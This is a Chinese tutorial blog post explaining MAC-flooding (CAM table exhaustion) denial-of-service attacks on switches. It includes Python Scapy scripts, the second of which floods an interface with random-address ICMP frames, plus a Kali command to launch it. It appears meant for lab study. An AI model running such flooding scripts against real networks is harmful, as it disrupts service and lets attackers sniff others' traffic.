DoS：数据链路层DoS用例

DoS：数据链路层DoS用例
DoS(Denial of Services, DoS)拒绝服务攻击使计算机或网络无法提供正常的服务，是黑客常用的攻击手段之一。常见的DoS攻击包括计算机网络带宽攻击和连通性攻击两种类型。常用的拒绝服务攻击手段包括：同步洪流、WinNuke、死亡之PING、Echl攻击、ICMP/SMURF、Finger炸弹、Land攻击、Ping洪流、Rwhod、tearDrop、TARGA3、UDP攻击、OOB等。黑客可能利用TCP/IP协议层中的数据链路层、网络层、传输层和应用层各种协议漏洞发起拒绝服务攻击。

1.数据链路层DoS
数据链路层中拒绝服务攻击的方式一般很少为人所熟知。数据链路层拒绝服务攻击的主要目标为二层交换机。数据链路层的拒绝服务攻击就是通过伪造请求主机的MAC地址信息，使得交换机内部CAM短时间填满，失去交换机本身的记忆功能，退化成集线器，当接收到正常数据包时，会将全部数据以广播的形式发送出去，此时若攻击者将自己的主机设置为混杂模式，就可以监听网络中的其他主机接收的数据了。

实验环境：

OS: macOS Monterey Version 12.3.1(英文版)

OS: Linux kali 5.10.0

IDE: PyCharm 2020.1

功能演示：

1）构造随机的MAC地址
利用Scapy自带的库函数RandMAC()

代码如下：

#_*_coding:utf-8_*_
# 作者      ：liuxiaowei
# 创建时间   ：4/25/22 9:27 PM
# 文件      ：macof.py
# IDE      ：PyCharm

from scapy.all import *
import time
while(1):
    packet = Ether(src=RandMAC(), dst=RandMAC())
    time.sleep(1)
    print(packet.summary())

结果如下：

(venv) (base) liuxiaowei@MacBookAir 数据链路层DoS % python3 macof.py 
e7:01:d5:83:97:db > fb:13:5f:e7:8c:69 (0x9000)
01:81:43:3f:cc:80 > cb:1d:9b:f8:38:c2 (0x9000)
16:81:bc:52:09:f5 > 8d:be:18:61:2d:e5 (0x9000)
63:c1:a2:c9:af:d4 > a8:1f:89:46:16:ec (0x9000)
c8:c8:9c:5e:23:ad > 1a:0d:6f:87:71:e5 (0x9000)
e8:9e:e1:ea:65:b8 > 67:36:89:26:96:74 (0x9000)
58:51:09:6d:27:4c > bc:1e:2b:31:37:f1 (0x9000)
2f:d4:82:c6:d1:51 > 7d:a7:69:56:ee:90 (0x9000)
9a:dc:ea:56:42:6c > 6a:52:59:94:cd:48 (0x9000)
10:ae:b1:f9:05:6b > b8:47:6e:62:92:de (0x9000)
............

2.ICMP数据包为例
当路由器接收到包含随机生成的IP地址和MAC地址的数据包时，交换机查询CAM，若不存在该信息，就会不断进行记录。短时间内，大量请求会导致CAM被填满，失去交换机原有的功能。

示例代码如下：

from scapy.all import *
import optparse

def attack(interface):
    pkt = Ether(src=RandMAC(), dst=RandMAC())/IP(src=RandIP(), dst=RandIP())/ICMP()
    sendp(pkt, iface=interface)

def main():
    parser = optparse.OptionParser('%prog ' + '-i interface')
    parser.add_option('-i', dest='interface', default='eth0', type='string', help='Interface')
    (options, args) = parser.parse_args()
    interface = options.interface
    try:
        while True:
            attack(interface)
    except KeyboardInterrupt:
        print('-------------------')
        print('Finished!')

if __name__ == '__main__':
    main()

在kali系统命令行执行如下命令：

┌──(root💀kali)-[~/Desktop]
└─# python3 icmpof.py -i eth0

运行结果如下图：